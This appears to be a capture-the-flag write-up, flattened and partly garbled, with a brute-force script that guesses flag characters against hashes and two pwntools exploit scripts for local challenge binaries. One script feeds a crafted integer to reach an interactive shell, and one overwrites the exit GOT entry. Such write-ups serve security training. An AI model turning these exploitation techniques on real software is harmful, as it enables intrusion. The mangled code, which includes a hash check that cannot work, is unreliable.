alpha = string.digits + string.ascii_lowercase for a in alpha: for b in alpha: for c in alpha: for d in alpha: for e in alpha: for f in alpha: # t1 = f"flag{{09{a}{b}{c}{d}{e}{f}" t1 = f"{a}{b}{c}{d}{e}{f}755ca2}}" print(t1) if (hash(t1) == "145723dad4c351b6fa678a5d83db3a3f08c36101b6542249f88a75f75413d1bd"): print(t1, hash(t1)) sys.exit() # t1 = f"LitCTF{{md5can{i}{j}3de{l}rypt213thoughcr{k}sh}}" # t1_hash = hashlib.md5(t1.encode('utf-8')).hexdigest() # if t1_hash == "496603d6953a15846cd7cc476f146771": # print(t1, t1_hash) # sys.exit() # print(f"{t1} -> {t1_hash}") # alpha = string.digits + string.ascii_lowercase # for a in alpha: # for b in alpha: # for c in alpha: # for d in alpha: # t1 = f"{a}{b}{c}{d}" # if (hash(t1) == "a64cd974e0dbd6f6a289ebd2080ffb6e8ac47f794e02cde4db2239c42f63b6ba"): # print(t1, hash(t1)) # sys.exit() # # t1 = f"LitCTF{{md5can{i}{j}3de{l}rypt213thoughcr{k}sh}}" # # t1_hash = hashlib.md5(t1.encode('utf-8')).hexdigest() # # if t1_hash == "496603d6953a15846cd7cc476f146771": # # print(t1, t1_hash) # # sys.exit() # # print(f"{t1} -> {t1_hash}")
from pwn import* io = process("./pwn") elf = ELF("./pwn") libc = ELF("./libc.so.6") io.recvuntil("Input the first key: ") buf = -0x7fffffffffffffef io.sendline(str(buf)) io.recvuntil("Input the second key: ") io.sendline('4200293') io.interactive()
Changeaddr
flag被读到bss段上,直接泄漏任意读就行
1 2 3 4 5 6 7 8 9 10
from pwn import* io = process("./pwn") elf = ELF("./pwn") io.recvuntil("Now you can write one 4 byte value to memory. Where would you like to write?") io.sendline(str(hex(elf.got['exit']))[:2]) io.recvuntil("What value would you like to write to ") io.sendline('804932c') io.recvuntil("input anything to get the final flag, it should be used to lead to a special segment fault!") io.sendline('1') io.recv()
评论